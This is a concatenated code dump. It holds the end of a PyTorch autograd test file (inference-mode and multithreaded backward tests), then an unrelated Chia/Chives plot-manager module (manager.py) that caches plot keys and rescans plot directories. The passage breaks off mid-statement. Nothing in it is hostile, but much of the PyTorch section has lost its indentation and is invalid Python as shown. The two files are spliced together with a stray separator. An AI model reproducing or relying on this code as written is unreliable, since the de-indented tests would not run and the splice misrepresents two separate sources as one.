        tmp = torch.ones(1, 2, 3, requires_grad=True)
        self.assertTrue(tmp.requires_grad)
        self.assertTrue(torch.is_inference(tmp))

        tmp = torch.ones(1, 2, 3).requires_grad_(False)
        self.assertFalse(tmp.requires_grad)
        self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
    """Multithreaded backward()/grad() tests: Hogwild-style shared inputs,
    partially shared graphs, and jit fork/join parallelism."""

    def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
        """Run fn(*args, **kwargs) concurrently on `num_threads` python threads.

        Fix: `kwargs` used to be accepted but silently dropped, and
        `args=(args)` was a no-op parenthesization rather than a tuple.
        """
        threads = []
        for _ in range(num_threads):
            p = threading.Thread(target=fn, args=args, kwargs=kwargs or {})
            p.start()
            threads.append(p)
        for p in threads:
            p.join()

    def test_simple_backward(self):
        # simple multithreaded backward that create threads in the beginning of training
        # and everything else is training separately, i.e. inputs, operations, etc.
        def train_fn():
            x = torch.ones(5, 5, requires_grad=True)
            y = (x + 3) * (x + 4) * 0.5
            y.sum().backward()
            self.assertEqual(x.grad, x + 3.5)

        self._run_py_multithread_fn(train_fn)

    def test_simple_backward_same_input(self):
        # simple multithreaded backward with only shared inputs (i.e. This is common
        # for things like Hogwild multithreaded training with multiple CPU threads)
        def train_fn_backward(x):
            y = (x + 3) * (x + 4) * 0.5
            y.sum().backward()

        x = torch.ones(5, 5, requires_grad=True)
        self._run_py_multithread_fn(train_fn_backward, (x,))
        # Since we are calling backward from multiple threads
        # and all threads share the same input, when we do backward
        # concurrently, different backwards will all accumulate to
        # the same .grad for each input, and the gradients should
        # be equal to num_threads * gradient
        self.assertEqual(x.grad, 10 * (x + 3.5))

        def train_fn_grad(x):
            y = (x + 3) * (x + 4) * 0.5
            grads = torch.autograd.grad(y.sum(), x)
            self.assertEqual(len(grads), 1)
            self.assertEqual(grads[0], x + 3.5)

        # since we use functional grad() api, gradients will not
        # be accumulate to the same place and should be the same
        self._run_py_multithread_fn(train_fn_grad, (x,))

    def test_python_thread_in_middle(self):
        # User might write a network that starts on one CPU thread, then runs its second half
        # concurrently with other threads (either via python threading or fork/join calls),
        # then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
        # bottom to output at the top. This way part of the GraphTask is being shared across
        # different threads and we need to ensure user specify retain_graph=True, otherwise
        # error out with the correct error message

        # Case 1: multiple backward with python threads, retain_graph=False
        # should throw error in some threads with no retain_graph.
        success_vs_raises = [0, 0]

        def train_fn_no_retain_graph(x):
            y = x + x ** 2
            try:
                y.sum().backward()
                success_vs_raises[0] += 1
            except RuntimeError as error:
                success_vs_raises[1] += 1
                self.assertRegex(str(error), "Specify retain_graph=True")

        x_no_retain = torch.ones(5, 5, requires_grad=True)
        y_no_retain = x_no_retain + x_no_retain ** 2
        self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
        # at least one thread will be success in this case, all other threads should raise
        # with the error that throw to user to recommend them specify retain_graph=True
        self.assertGreaterEqual(success_vs_raises[0], 1)

        # multiple backward with python threads, no error with retain_graph=True
        def train_fn_retain_graph(x):
            y = x + x ** 2
            y.sum().backward(retain_graph=True)

        x_retain = torch.ones(5, 5, requires_grad=True)
        y_retain = x_retain + x_retain ** 2
        self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
        # result should equal to num_thread * gradients
        self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))

    def test_fork_join_in_middle(self):
        # multiple backward with jit threads (fork/join primitive)
        # similar to test_python_thread_in_middle, we test with retain_graph=False/True

        # Case 1: multiple grad() calls with jit threads, retain_graph=False
        # should throw error in some threads with no retain_graph.
        @torch.jit.script
        def train_fn_jit_no_retain(middle, orig_x):
            y = middle + middle ** 2
            return torch.autograd.grad([y.sum()], [orig_x])

        @torch.jit.script
        def train_fn_fork_join_calls_no_retain(x):
            y_no_retain = (x + 3) * (x + 4) * 0.5

            fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
            grad_hat = train_fn_jit_no_retain(y_no_retain, x)
            grad = torch.jit._wait(fut)
            return grad, grad_hat

        try:
            train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
        except RuntimeError as error:
            self.assertRegex(str(error), "Specify retain_graph=True")

        # Case 2: no error with retain_graph=True
        @torch.jit.script
        def train_fn_jit_retain(middle, orig_x):
            y = middle + middle ** 2
            return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)

        @torch.jit.script
        def train_fn_fork_join_calls_retain(x):
            y_retain = (x + 3) * (x + 4) * 0.5
            fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
            fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
            grad = train_fn_jit_retain(y_retain, x)
            grad1 = torch.jit._wait(fut1)
            grad2 = torch.jit._wait(fut2)
            return grad, grad1, grad2

        grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
        self.assertEqual(grad, grad1)
        self.assertEqual(grad, grad2)

    def test_preserve_backtrace(self):
        class Foo(torch.autograd.Function):
            @staticmethod
            def forward(ctx, input):
                return input

            @staticmethod
            def backward(ctx, *grad):
                raise ValueError("something")

        t = torch.rand(10, requires_grad=True)
        try:
            Foo.apply(t).sum().backward()
        except Exception:
            import traceback
            tb = sys.exc_info()[2]
            tb_str = "\n".join(traceback.format_tb(tb))
            self.assertIn('raise ValueError("something")', tb_str)

    # TODO(@anjali411): add an OpInfo based test for torch.cat
    # Issue: https://github.com/pytorch/pytorch/issues/51627
    def test_cat_r_to_c(self):
        inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
        inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)

        def fn(x1, x2):
            return torch.cat((x1, x2), dim=-1)

        torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
        torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Generate per-device variants of the device-generic autograd tests,
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
    TestAutogradDeviceType,
    globals(),
    except_for=None
)

if __name__ == '__main__':
    run_tests()
|
manager.py | from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from chia.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from chia.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
)
from chia.util.generator_tools import list_to_batches
from chia.util.ints import uint16
from chia.util.path import mkdir
from chia.util.streamable import Streamable, streamable
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.wallet.derive_keys import master_sk_to_local_sk
from chia.wallet.derive_chives_keys import master_sk_to_chives_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
    """Key material parsed from a plot's memo, cached per plot id so plots
    don't need to be re-parsed on every refresh."""

    # Exactly one of the two pool fields is set (see refresh_batch): either a
    # pool public key or, for NFT plots, a pool contract puzzle hash.
    pool_public_key: Optional[G1Element]
    pool_contract_puzzle_hash: Optional[bytes32]
    plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
    """On-disk serialization format of the plot cache."""

    # Compared against CURRENT_VERSION on load; mismatches are rejected.
    version: uint16
    data: List[Tuple[bytes32, CacheEntry]]
class Cache:
    """In-memory plot cache with explicit save/load persistence to one file."""

    _changed: bool
    _data: Dict[bytes32, CacheEntry]

    def __init__(self, path: Path):
        self._changed = False
        self._data = {}
        self._path = path
        parent = path.parent
        if not parent.exists():
            mkdir(parent)

    def __len__(self):
        return len(self._data)

    def update(self, plot_id: bytes32, entry: CacheEntry):
        """Insert or overwrite the entry for `plot_id`; marks the cache dirty."""
        self._data[plot_id] = entry
        self._changed = True

    def remove(self, cache_keys: List[bytes32]):
        """Drop every present key in `cache_keys`; marks dirty per removal."""
        for cache_key in cache_keys:
            if cache_key not in self._data:
                continue
            del self._data[cache_key]
            self._changed = True

    def save(self):
        """Serialize the cache to disk. Failures are logged, never raised."""
        try:
            entries = list(self.items())
            serialized: bytes = bytes(DiskCache(CURRENT_VERSION, entries))
            self._path.write_bytes(serialized)
            self._changed = False
            log.info(f"Saved {len(serialized)} bytes of cached data")
        except Exception as e:
            log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")

    def load(self):
        """Load the cache from disk. A missing file or any error leaves the
        current in-memory data untouched; errors are only logged."""
        try:
            serialized = self._path.read_bytes()
            log.info(f"Loaded {len(serialized)} bytes of cached data")
            stored_cache: DiskCache = DiskCache.from_bytes(serialized)
            if stored_cache.version != CURRENT_VERSION:
                # TODO, Migrate or drop current cache if the version changes.
                raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
            self._data = dict(stored_cache.data)
        except FileNotFoundError:
            log.debug(f"Cache {self._path} not found")
        except Exception as e:
            log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")

    def keys(self):
        return self._data.keys()

    def items(self):
        return self._data.items()

    def get(self, plot_id):
        return self._data.get(plot_id)

    def changed(self):
        return self._changed

    def path(self):
        return self._path
class PlotManager:
    """Tracks all plot files below the configured plot directories.

    A background thread periodically rescans the directories in batches,
    loads new plots (validating their keys against the farmer's key lists),
    drops vanished ones and reports progress via `_refresh_callback`.
    """

    plots: Dict[Path, PlotInfo]
    # plot file name -> (directory it was loaded from, directories with duplicates)
    plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
    plot_filename_paths_lock: threading.Lock
    # path -> unix timestamp of the last failed open; used for retry back-off
    failed_to_open_filenames: Dict[Path, int]
    no_key_filenames: Set[Path]
    farmer_public_keys: List[G1Element]
    pool_public_keys: List[G1Element]
    cache: Cache
    match_str: Optional[str]
    open_no_key_filenames: bool
    last_refresh_time: float
    refresh_parameter: PlotsRefreshParameter
    log: Any
    _lock: threading.Lock
    _refresh_thread: Optional[threading.Thread]
    _refreshing_enabled: bool
    _refresh_callback: Callable

    def __init__(
        self,
        root_path: Path,
        refresh_callback: Callable,
        match_str: Optional[str] = None,
        open_no_key_filenames: bool = False,
        refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
    ):
        self.root_path = root_path
        self.plots = {}
        self.plot_filename_paths = {}
        self.plot_filename_paths_lock = threading.Lock()
        self.failed_to_open_filenames = {}
        self.no_key_filenames = set()
        self.farmer_public_keys = []
        self.pool_public_keys = []
        self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
        self.match_str = match_str
        self.open_no_key_filenames = open_no_key_filenames
        self.last_refresh_time = 0
        self.refresh_parameter = refresh_parameter
        self.log = logging.getLogger(__name__)
        self._lock = threading.Lock()
        self._refresh_thread = None
        self._refreshing_enabled = False
        self._refresh_callback = refresh_callback  # type: ignore

    def __enter__(self):
        # `with plot_manager:` serializes access to the shared plot state.
        self._lock.acquire()

    def __exit__(self, exc_type, exc_value, exc_traceback):
        self._lock.release()

    def reset(self):
        """Clear all discovered plot state (keeps keys, cache and callbacks)."""
        with self:
            self.last_refresh_time = time.time()
            self.plots.clear()
            self.plot_filename_paths.clear()
            self.failed_to_open_filenames.clear()
            self.no_key_filenames.clear()

    def set_refresh_callback(self, callback: Callable):
        self._refresh_callback = callback  # type: ignore

    def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
        self.farmer_public_keys = farmer_public_keys
        self.pool_public_keys = pool_public_keys

    def public_keys_available(self):
        # Truthy only when both key lists are non-empty.
        return len(self.farmer_public_keys) and len(self.pool_public_keys)

    def plot_count(self):
        with self:
            return len(self.plots)

    def get_duplicates(self):
        """Return full paths of all plot files that exist in multiple directories."""
        result = []
        for plot_filename, paths_entry in self.plot_filename_paths.items():
            _, duplicated_paths = paths_entry
            for path in duplicated_paths:
                result.append(Path(path) / plot_filename)
        return result

    def needs_refresh(self) -> bool:
        return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)

    def start_refreshing(self):
        """Start the background refresh thread (loads the disk cache first)."""
        self._refreshing_enabled = True
        if self._refresh_thread is None or not self._refresh_thread.is_alive():
            self.cache.load()
            self._refresh_thread = threading.Thread(target=self._refresh_task)
            self._refresh_thread.start()

    def stop_refreshing(self):
        self._refreshing_enabled = False
        if self._refresh_thread is not None and self._refresh_thread.is_alive():
            self._refresh_thread.join()
            self._refresh_thread = None

    def trigger_refresh(self):
        # Setting last_refresh_time to 0 makes needs_refresh() true immediately.
        log.debug("trigger_refresh")
        self.last_refresh_time = 0

    def _refresh_task(self):
        """Background loop: wait until a refresh is due, then rescan all plot
        directories in batches, firing the callback for each stage."""
        while self._refreshing_enabled:
            try:
                while not self.needs_refresh() and self._refreshing_enabled:
                    time.sleep(1)

                if not self._refreshing_enabled:
                    return

                plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
                plot_directories: Set[Path] = set(plot_filenames.keys())
                plot_paths: List[Path] = []
                for paths in plot_filenames.values():
                    plot_paths += paths

                total_result: PlotRefreshResult = PlotRefreshResult()
                total_size = len(plot_paths)

                self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))

                # First drop all plots we have in plot_filename_paths but are no longer in the filesystem or set in config
                for path in list(self.failed_to_open_filenames.keys()):
                    if path not in plot_paths:
                        del self.failed_to_open_filenames[path]

                for path in self.no_key_filenames.copy():
                    if path not in plot_paths:
                        self.no_key_filenames.remove(path)

                filenames_to_remove: List[str] = []
                for plot_filename, paths_entry in self.plot_filename_paths.items():
                    loaded_path, duplicated_paths = paths_entry
                    loaded_plot = Path(loaded_path) / Path(plot_filename)
                    if loaded_plot not in plot_paths:
                        filenames_to_remove.append(plot_filename)
                        with self:
                            if loaded_plot in self.plots:
                                del self.plots[loaded_plot]
                        total_result.removed.append(loaded_plot)
                        # No need to check the duplicates here since we drop the whole entry
                        continue

                    paths_to_remove: List[str] = []
                    for path in duplicated_paths:
                        loaded_plot = Path(path) / Path(plot_filename)
                        if loaded_plot not in plot_paths:
                            paths_to_remove.append(path)
                            total_result.removed.append(loaded_plot)
                    for path in paths_to_remove:
                        duplicated_paths.remove(path)

                for filename in filenames_to_remove:
                    del self.plot_filename_paths[filename]

                for remaining, batch in list_to_batches(plot_paths, self.refresh_parameter.batch_size):
                    batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
                    if not self._refreshing_enabled:
                        self.log.debug("refresh_plots: Aborted")
                        break
                    # Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
                    batch_result.remaining = remaining
                    total_result.loaded += batch_result.loaded
                    total_result.processed += batch_result.processed
                    total_result.duration += batch_result.duration

                    self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
                    if remaining == 0:
                        break
                    batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
                    self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
                    time.sleep(float(batch_sleep) / 1000.0)

                if self._refreshing_enabled:
                    self._refresh_callback(PlotRefreshEvents.done, total_result)

                # Cleanup unused cache: drop entries for plots that no longer exist
                available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
                invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
                self.cache.remove(invalid_cache_keys)
                self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")

                if self.cache.changed():
                    self.cache.save()

                self.last_refresh_time = time.time()

                self.log.debug(
                    f"_refresh_task: total_result.loaded {len(total_result.loaded)}, "
                    f"total_result.removed {len(total_result.removed)}, "
                    f"total_duration {total_result.duration:.2f} seconds"
                )
            except Exception as e:
                log.error(f"_refresh_callback raised: {e} with the traceback: {traceback.format_exc()}")
                self.reset()

    def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
        """Load (or re-validate) one batch of plot files using a thread pool."""
        start_time: float = time.time()
        result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
        counter_lock = threading.Lock()

        log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")

        if self.match_str is not None:
            log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')

        def process_file(file_path: Path) -> Optional[PlotInfo]:
            # Returns the PlotInfo for a loadable plot file, or None when the
            # file is skipped (filtered, failing, duplicated, missing keys, ...).
            if not self._refreshing_enabled:
                return None
            filename_str = str(file_path)
            if self.match_str is not None and self.match_str not in filename_str:
                return None
            if (
                file_path in self.failed_to_open_filenames
                and (time.time() - self.failed_to_open_filenames[file_path])
                < self.refresh_parameter.retry_invalid_seconds
            ):
                # Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
                return None
            if file_path in self.plots:
                return self.plots[file_path]
            entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
            if entry is not None:
                loaded_parent, duplicates = entry
                if str(file_path.parent) in duplicates:
                    log.debug(f"Skip duplicated plot {str(file_path)}")
                    return None
            try:
                if not file_path.exists():
                    return None

                prover = DiskProver(str(file_path))

                log.debug(f"process_file {str(file_path)}")

                expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
                stat_info = file_path.stat()

                # TODO: consider checking if the file was just written to (which would mean that the file is still
                # being copied). A segfault might happen in this edge case.

                if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
                    log.warning(
                        f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
                        f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
                    )
                    return None

                cache_entry = self.cache.get(prover.get_id())
                if cache_entry is None:
                    (
                        pool_public_key_or_puzzle_hash,
                        farmer_public_key,
                        local_master_sk,
                    ) = parse_plot_info(prover.get_memo())

                    # Only use plots that have the correct keys associated with them
                    if farmer_public_key not in self.farmer_public_keys:
                        log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
                        self.no_key_filenames.add(file_path)
                        if not self.open_no_key_filenames:
                            return None

                    pool_public_key: Optional[G1Element] = None
                    pool_contract_puzzle_hash: Optional[bytes32] = None
                    if isinstance(pool_public_key_or_puzzle_hash, G1Element):
                        pool_public_key = pool_public_key_or_puzzle_hash
                    else:
                        assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
                        pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash

                    if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
                        log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
                        self.no_key_filenames.add(file_path)
                        if not self.open_no_key_filenames:
                            return None

                    # If a plot is in `no_key_filenames` the keys were missing in earlier refresh cycles. We can remove
                    # the current plot from that list if it's in there since we passed the key checks above.
                    if file_path in self.no_key_filenames:
                        self.no_key_filenames.remove(file_path)

                    # k < 32 plots use the chives local-key derivation path
                    # (see master_sk_to_chives_local_sk).
                    if prover.get_size()<32:
                        local_sk = master_sk_to_chives_local_sk(local_master_sk)
                    else:
                        local_sk = master_sk_to_local_sk(local_master_sk)

                    plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
                        local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
                    )

                    cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
                    self.cache.update(prover.get_id(), cache_entry)

                with self.plot_filename_paths_lock:
                    paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
                    if paths is None:
                        paths = (str(Path(prover.get_filename()).parent), set())
                        self.plot_filename_paths[file_path.name] = paths
                    else:
                        paths[1].add(str(Path(prover.get_filename()).parent))
                        log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
                        return None

                new_plot_info: PlotInfo = PlotInfo(
                    prover,
                    cache_entry.pool_public_key,
                    cache_entry.pool_contract_puzzle_hash,
                    cache_entry.plot_public_key,
                    stat_info.st_size,
                    stat_info.st_mtime,
                )

                with counter_lock:
                    result.loaded.append(new_plot_info)

                if file_path in self.failed_to_open_filenames:
                    del self.failed_to_open_filenames[file_path]

            except Exception as e:
                tb = traceback.format_exc()
                log.error(f"Failed to open file {file_path}. {e} {tb}")
                self.failed_to_open_filenames[file_path] = int(time.time())
                return None

            log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
            return new_plot_info

        with self, ThreadPoolExecutor() as executor:
            plots_refreshed: Dict[Path, PlotInfo] = {}
            for new_plot in executor.map(process_file, plot_paths):
                if new_plot is not None:
                    plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
            self.plots.update(plots_refreshed)

        result.duration = time.time() - start_time

        self.log.debug(
            f"refresh_batch: loaded {len(result.loaded)}, "
            f"removed {len(result.removed)}, processed {result.processed}, "
